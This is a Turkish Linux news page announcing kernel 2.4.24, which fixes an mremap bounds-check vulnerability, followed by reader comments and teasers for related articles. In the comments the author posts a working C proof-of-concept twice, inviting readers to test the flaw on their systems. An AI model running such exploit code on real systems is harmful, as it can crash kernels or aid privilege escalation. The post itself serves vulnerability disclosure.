Kernel 2.4.24 Çıktı

0
bahadirkandemir
bahadirkandemir
6 Ocak 2004 , 1 dakika okuma süresi
Kernel'in bellek yönetim kodunda, mremap(2) sistem çağrısındaki hatalı sınır kontrolünden kaynaklanan bir güvenlik zayıflığı bulundu.

mremap sistem çağrısı, sanal bellek alanlarının adreslenebilir boşluklarını taşımak ve boyutlarını değiştirme imkanı sağlıyor.

Duyurunun tamamı: http://isec.pl/vulnerabilities/isec-0013-mremap.txt
linux
3
Linkedin Facebook Twitter Google plus

Görüşler

bahadirkandemir
0
bahadirkandemir
NOT: Bu zayıflığın 2.2, 2.4 ver 2.6 serilerinde olduğu belirtilmişti ancak, zayıflığı keşfeden güvenlik grubu bu açığın MREMAP_FIXED bayrağını desteklemeyen 2.2 serilerinde olmadığını önemli güvenlik listelerinde duyurdu.

Kernel 2.6.0'da aynı zayıflığın olduğu duyurulmuştu, 2.6.1-rc1'de zayıflığın giderilmediği, 2.6.1-rc2'de giderildiği ek bir açıklama ile duyuruldu.

Zayıflığı test etmek isteyenler aşağıdaki kodu deneyebilir:

#include
#include
#include
#include

#define MREMAP_MAYMOVE 1
#define MREMAP_FIXED 2

#define __NR_real_mremap __NR_mremap

static inline _syscall5( void *, real_mremap, void *, old_address,
size_t, old_size, size_t, new_size,
unsigned long, flags, void *, new_address );

int main( void )
{
void *base;

base = mmap( NULL, 8192, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 );

real_mremap( base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED,
(void *) 0xC0000000 );

fork();

return( 0 );
}
realist
0
realist
ne #include ediyoruz?
hangi #include ?
bahadirkandemir
0
bahadirkandemir
Sanırım < ve > karakterleri sorun yarattı. 2 kere önizleme yapmamdan kaynaklandı.

----------------------------------------------

#include <asm/unistd.h>
#include <sys/mman.h>
#include <unistd.h>
#include <errno.h>

#define MREMAP_MAYMOVE 1
#define MREMAP_FIXED 2

#define __NR_real_mremap __NR_mremap

static inline _syscall5( void *, real_mremap, void *, old_address,
size_t, old_size, size_t, new_size,
unsigned long, flags, void *, new_address );

int main( void )
{
void *base;

base = mmap( NULL, 8192, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 );

real_mremap( base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED,
(void *) 0xC0000000 );

fork();

return( 0 );
}
Görüş belirtmek için giriş yapın...

İlgili Yazılar

Evde kendi Wap Gateway`inizi kurun!
larweda
5 Ocak 2001, 1 dakika okuma süresi

Her geçen gün biryerlerde duyuyoruz, WAP aşağı, WAP yukarı. Bu WAP denilen şey aslında, bildiğimiz yaygın internet protokolünün (HTTP) cep telefonu şebekeleri için ufaltılmış bir hali. Yani internet'te ulaşabildiğiniz şeylerinin ufak bir kümesine, o da doğru bir şekilde biçimlendirilirse, cep telefonunuzdan da ulaşabiliyorsunuz. Bu servisi vermek için bir servis sağlayıcısına ihtiyacınız var. Artık evde linux yüklü orta halli bir bilgisayarınız varsa, kendi kendinize de wap gateway olabiliyorsunuz.

Slackware 11.0 duyuruldu!
anonim
3 Ekim 2006, 1 dakika okuma süresi

Bir yıldan daha uzun süredir beklenen ve yaşayan Linux dağıtımları arasında en eskisi -bir grup Linux kullanıcısına göre de en iyisi- olan Slackware Linux'un 11.0 sürümü duyuruldu. Ayrıntılar www.slackware.com adresinden öğrenilebilir.

Arch Linux 0.5 İncelemesi
anonim
8 Ekim 2003, 1 dakika okuma süresi

Arch Linux kendisi gibi fazla bilinmeyen Crux linux üzerine kurulu bir dağıtım. En büyük özelliği BSD ve Gentoo tarzı ports sistemine sahip olması bu da yazılım kurmayı fazlasıyla kolay hale getiriyor. Arch´ın farkı kaynak tabanlı değil binary bir dağıtım olması bu da Gentoo ya oranla daha hızlı kurulum anlamına geliyor.

XmlLinux--Türkiye nin ilk xml linux haber portalı
ghanthar
2 Aralık 2003, 1 dakika okuma süresi

XmlLinux sitesini açmış bulunuyorum. Sitenin işleyişi oldukça basit ancak pratik anlamda işlevsel olabileceği kanısındayım. Site nuke sistemleri tarafından yaratılan xml haber dosyalarını yayımlıyor. Pratik anlamda ise bu şu demek: Türkiye deki pek çok linux sitesinin haber başlıklarını (tüm haberler otomatik olarak saat başı güncellenmektedir) tek bir sayfadan okuyabiliyorsunuz. Yapmanız gereken tek şey başlığa tıklayarak okumak istediğiniz habere doğrudan gitmek ve okumak. Her gün bir dolu siteyi gezmekten kurtarabileceğini düşündüğüm basit bir sistem.
Ziyaret etmek için XmlLinux.ghanthar.net

HEV Kemerköy Okulları Linux Eğitimlerine başladı
erol
21 Şubat 2002, 1 dakika okuma süresi

SuSE Linux'un Türkiye dağıtımcısı olan HEV Kemerköy Okulları SuSE tabanlı Linux eğitimleri vermeye başladı. Şu anda 6 farklı eğitim seçeneği sunan okul ileride LPI sınavlarını da desteklemeyi planlıyor. Daha fazla bilgi için www.kemerkoy.k12.tr/suse/